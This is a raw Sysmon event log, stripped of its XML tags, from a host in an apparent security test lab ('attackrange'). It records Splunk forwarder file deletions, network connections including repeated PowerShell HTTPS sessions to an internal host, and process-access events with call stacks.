AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56539-false10.0.1.12-8089- 23542300x800000000000000035083940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:56.834{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D0E59AA4127E79FD8A7ED12DED5810B,SHA256=77BC08D963521710674C4FC7EDE54EB09E9D8C025F4EA2ED4057F9E0AA96B9CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:57.848{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50EDE546FFDE41C70CF26968F052EFA8,SHA256=4F00F686200468DF11A4D764AC0F62463E650B67F31DA2B5374420460A70894D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:58.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4F30108BDBD3E1F95F48946379A220F,SHA256=32BE206F1B90C6FD866402D8139E5880D63B1C52E6207E95D96ACD8FD36F029D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:58.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FABD5D3157B55BBEDF1BDD19B8C9A778,SHA256=257CF2B7A1A6771B19124686DB90C45300E87B1965555FB267314FE63DB93268,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:59.867{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557105219B82AAD2679E9E11DCC858EC,SHA256=89F74B3E5C9B01A2331C4F0F62179D1BA72E0A8D562DB132F630B455C5A5D1EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:23.501{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56540-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:00.886{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7854435CD4987885DE560722F88A949C,SHA256=22280354AE566D01136BB424D7F596B348AF028B388840429EDF3591797FC16C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:24.177{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56541-false10.0.1.12-8000- 23542300x800000000000000035083949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:01.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BCA925167C6AD3B61A1E536B3606606,SHA256=3D9CF9034D42E08208FC54AB0DDD353CBCF4D4CF3664878536A1EB9B8E93CAAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:02.915{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F589CDAAD29C99D232B04518798FD56,SHA256=216848C58848B279C41CFB927FF41CC42E7E3F509F188D81A4E9C5F5391918CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:03.930{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E64007DCE2EF03FE825F7EB9939BBB1,SHA256=F45E10B62B809BB2008C23BCFC47145E6DA1051D071790A23E9A197740B1DEB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:03.565{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFAFB9AF3A3091D6979CD2F3BB0C6BF0,SHA256=D49E3672B6BD8A885B0A526C21C1135FD20BDBADDE3F87248137D8196E47126D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:04.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AD1707F5865F5F940C751D1E05A33B,SHA256=F0D9C838C4EC6E04CCDFAF654C1B02334D675F5BB892375AC055CDEC48420D1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:28.514{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56542-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:05.946{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977592E44EBB6FC0FB15F6F5E3B666F8,SHA256=7ECD40504CC369632CCA677DF4C83ADE971B899563894C5EE1450D5DE129D447,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:30.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56543-false10.0.1.12-8000- 23542300x800000000000000035083957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:06.964{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EFD57BFD02F046FB68CCD6762E6DA48,SHA256=4FABA99B0EDCE99A53558A29AC4C1BC4C2332D29478DEBB119A9CB6025DDB1EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:07.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038A3A5151795059B1D6ABCA1750B78C,SHA256=100389203BD8D56397A2DBE5020AF44C06254B58103EDEDAC0227B30286342F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:08.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=682C600E50C67F992C98598801CC64BC,SHA256=64FE7D4C30525B1B672E77A4AC76E30E1354DFE80148512F5FBD00BF40B58DE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:09.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=89B72BDED3FABED6CC9DCE9857048AAF,SHA256=901E35845135389A5D32C8A77B1880F82BF2F5CFCDC1208AF41504D7A536C94F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:34.527{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56544-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:10.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=585E7FB3CD022DA71E7B585A7D3D633A,SHA256=8CC0BE32CB0C0AC185B44EECD5BAF35BB5C8B11FA48496DA95497E208B1450FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:36.156{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56545-false10.0.1.12-8000- 23542300x800000000000000035083963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:11.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4682D13F2AC9239108C4FB1B86B0E448,SHA256=4AC60C61E63D0A5E1E5CDB51F75DF2EDE18C0D23D82AB56AC89300710DAC6926,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:12.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3188E44D952B5FBA0B573BC3242EF418,SHA256=5B86DF072BD8C74189744D4698805F86FB5D21C3D8A9207569B8FDE12646C7E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=689A8C8C1D34C0979329704F34D0D1F8,SHA256=3E146E90BB3A7AE435756D904CE219E2BFB7A70EF9615254B19CCB5C9C9C14A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.561{B81B27B7-4D8D-613A-2790-03000000C801}55964264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.392{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.378{B81B27B7-4D8D-613A-2790-03000000C801}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:13.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EE3297C044D931574AB92E1DFFE04D6,SHA256=62FF1572B07381F7BB5D2DAFE8C27D9BB96899C28121562698F1F155DF3A4818,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:38.539{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56546-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9B22E89EC0B38C66F9D09BD071D0B42,SHA256=2FB36CEE425F07EB002356561488FC84C695060EEEAED6A929BFC8A01903D28D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19124203914F4A0C5ED1DA982351D5C1,SHA256=782D265AC0292C599F9A5F8E826DC8771DCEBCBF09526607FE23F2B464739D06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D8E-613A-2890-03000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:14.093{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 